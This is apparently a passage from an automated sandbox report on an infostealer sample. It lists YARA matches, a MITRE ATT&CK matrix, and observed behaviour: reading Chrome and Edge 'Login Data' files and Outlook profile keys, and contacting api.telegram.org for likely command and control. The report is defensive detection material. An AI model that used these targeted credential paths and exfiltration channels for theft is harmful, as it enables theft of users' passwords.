            Source: C:\Users\user\Desktop\ja811MqV4h.exeCode function: 0_2_029CB038 GetVersionExA,0_2_029CB038
            Source: C:\Users\user\Links\daphpvwO.pifKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 5.3.daphpvwO.pif.268f6d60.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.2aec0000.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.2990e990.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.298e6458.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28880ee8.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.2aec0000.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.298e5570.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28600ca6.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28880ee8.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.3.daphpvwO.pif.268f6d60.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28880000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.2990e990.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28601b8e.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.298e5570.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28880000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28600ca6.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.298e6458.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28601b8e.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.3832357207.0000000028880000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3833108807.00000000298E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3833360482.000000002AEC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.1325957813.00000000268F6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3832140039.00000000285C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: daphpvwO.pif PID: 8816, type: MEMORYSTR
            Source: Yara matchFile source: 5.3.daphpvwO.pif.268f6d60.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.2aec0000.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.2990e990.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.298e6458.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28880ee8.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.2aec0000.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.298e5570.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28600ca6.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28880ee8.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.3.daphpvwO.pif.268f6d60.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28880000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.2990e990.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28601b8e.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.298e5570.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28880000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28600ca6.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.298e6458.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28601b8e.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.3832357207.0000000028880000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3833108807.00000000298E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3833360482.000000002AEC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.1325957813.00000000268F6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3832140039.00000000285C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: daphpvwO.pif PID: 8816, type: MEMORYSTR
            Source: Yara matchFile source: 5.3.daphpvwO.pif.268f6d60.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.2aec0000.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.2990e990.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.298e6458.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28880ee8.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.2aec0000.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.298e5570.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28600ca6.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28880ee8.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.3.daphpvwO.pif.268f6d60.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28880000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.2990e990.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28601b8e.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.298e5570.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28880000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28600ca6.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.298e6458.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28601b8e.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.3832357207.0000000028880000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3833108807.00000000298E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3833360482.000000002AEC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.1325957813.00000000268F6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3832140039.00000000285C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 5.3.daphpvwO.pif.268f6d60.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.2aec0000.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.2990e990.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.298e6458.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28880ee8.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.2aec0000.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.298e5570.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28600ca6.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28880ee8.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.3.daphpvwO.pif.268f6d60.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28880000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.2990e990.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28601b8e.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.298e5570.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28880000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28600ca6.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.298e6458.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28601b8e.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.3832357207.0000000028880000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3833108807.00000000298E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3833360482.000000002AEC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.1325957813.00000000268F6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3832140039.00000000285C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3832462601.0000000028925000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: daphpvwO.pif PID: 8816, type: MEMORYSTR
            Source: C:\Users\user\Links\daphpvwO.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: 5.3.daphpvwO.pif.268f6d60.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.2aec0000.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.2990e990.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.298e6458.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28880ee8.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.2aec0000.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.298e5570.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28600ca6.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28880ee8.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.3.daphpvwO.pif.268f6d60.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28880000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.2990e990.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28601b8e.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.298e5570.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28880000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28600ca6.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.298e6458.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28601b8e.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.3832357207.0000000028880000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3833108807.00000000298E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3833360482.000000002AEC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.1325957813.00000000268F6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3832140039.00000000285C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3832462601.0000000028925000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: daphpvwO.pif PID: 8816, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 5.3.daphpvwO.pif.268f6d60.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.2aec0000.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.2990e990.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.298e6458.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28880ee8.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.2aec0000.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.298e5570.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28600ca6.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28880ee8.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.3.daphpvwO.pif.268f6d60.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28880000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.2990e990.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28601b8e.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.298e5570.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28880000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28600ca6.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.298e6458.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28601b8e.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.3832357207.0000000028880000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3833108807.00000000298E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3833360482.000000002AEC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.1325957813.00000000268F6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3832140039.00000000285C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: daphpvwO.pif PID: 8816, type: MEMORYSTR
            Source: Yara matchFile source: 5.3.daphpvwO.pif.268f6d60.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.2aec0000.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.2990e990.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.298e6458.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28880ee8.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.2aec0000.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.298e5570.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28600ca6.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28880ee8.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.3.daphpvwO.pif.268f6d60.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28880000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.2990e990.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28601b8e.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.298e5570.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28880000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28600ca6.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.298e6458.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28601b8e.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.3832357207.0000000028880000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3833108807.00000000298E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3833360482.000000002AEC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.1325957813.00000000268F6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3832140039.00000000285C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: daphpvwO.pif PID: 8816, type: MEMORYSTR
            Source: Yara matchFile source: 5.3.daphpvwO.pif.268f6d60.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.2aec0000.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.2990e990.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.298e6458.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28880ee8.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.2aec0000.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.298e5570.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28600ca6.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28880ee8.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.3.daphpvwO.pif.268f6d60.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28880000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.2990e990.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28601b8e.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.298e5570.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28880000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28600ca6.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.298e6458.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28601b8e.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.3832357207.0000000028880000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3833108807.00000000298E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3833360482.000000002AEC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.1325957813.00000000268F6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3832140039.00000000285C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 5.3.daphpvwO.pif.268f6d60.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.2aec0000.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.2990e990.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.298e6458.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28880ee8.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.2aec0000.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.298e5570.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28600ca6.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28880ee8.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.3.daphpvwO.pif.268f6d60.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28880000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.2990e990.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28601b8e.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.298e5570.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28880000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28600ca6.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.298e6458.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.daphpvwO.pif.28601b8e.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.3832357207.0000000028880000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3833108807.00000000298E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3833360482.000000002AEC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.1325957813.00000000268F6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3832140039.00000000285C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3832462601.0000000028925000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: daphpvwO.pif PID: 8816, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure1
            Valid Accounts
            11
            Native API
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            1
            OS Credential Dumping
            1
            System Time Discovery
            Remote Services11
            Archive Collected Data
            1
            Web Service
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Shared Modules
            1
            Valid Accounts
            1
            Valid Accounts
            11
            Deobfuscate/Decode Files or Information
            1
            Input Capture
            1
            Account Discovery
            Remote Desktop Protocol1
            Data from Local System
            1
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts2
            Command and Scripting Interpreter
            Logon Script (Windows)1
            Access Token Manipulation
            3
            Obfuscated Files or Information
            Security Account Manager1
            File and Directory Discovery
            SMB/Windows Admin Shares1
            Email Collection
            11
            Encrypted Channel
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook312
            Process Injection
            4
            Software Packing
            NTDS26
            System Information Discovery
            Distributed Component Object Model1
            Input Capture
            3
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Timestomp
            LSA Secrets141
            Security Software Discovery
            SSHKeylogging14
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading
            Cached Domain Credentials41
            Virtualization/Sandbox Evasion
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
            Masquerading
            DCSync3
            Process Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            Valid Accounts
            Proc Filesystem1
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            Access Token Manipulation
            /etc/passwd and /etc/shadow1
            System Owner/User Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron41
            Virtualization/Sandbox Evasion
            Network Sniffing1
            System Network Configuration Discovery
            Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd312
            Process Injection
            Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1634983 Sample: ja811MqV4h.exe Startdate: 11/03/2025 Architecture: WINDOWS Score: 100 26 reallyfreegeoip.org 2->26 28 api.telegram.org 2->28 30 2 other IPs or domains 2->30 38 Suricata IDS alerts for network traffic 2->38 40 Found malware configuration 2->40 42 Malicious sample detected (through community Yara rule) 2->42 48 13 other signatures 2->48 8 ja811MqV4h.exe 6 2->8         started        signatures3 44 Tries to detect the country of the analysis system (by using the IP) 26->44 46 Uses the Telegram API (likely for C&C communication) 28->46 process4 file5 24 C:\Users\user\Links\daphpvwO.pif, PE32 8->24 dropped 50 Drops PE files with a suspicious file extension 8->50 52 Writes to foreign memory regions 8->52 54 Allocates memory in foreign processes 8->54 56 2 other signatures 8->56 12 daphpvwO.pif 15 2 8->12         started        16 cmd.exe 1 8->16         started        18 cmd.exe 1 8->18         started        signatures6 process7 dnsIp8 32 api.telegram.org 149.154.167.220, 443, 49711 TELEGRAMRU United Kingdom 12->32 34 checkip.dyndns.com 193.122.130.0, 49708, 80 ORACLE-BMC-31898US United States 12->34 36 reallyfreegeoip.org 104.21.32.1, 443, 49709 CLOUDFLARENETUS United States 12->36 58 Detected unpacking (changes PE section rights) 12->58 60 Detected unpacking (overwrites its own PE header) 12->60 62 Tries to steal Mail credentials (via file / registry access) 12->62 64 Tries to harvest and steal browser information (history, passwords, etc) 12->64 20 conhost.exe 16->20         started        22 conhost.exe 18->22         started        signatures9 process10

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.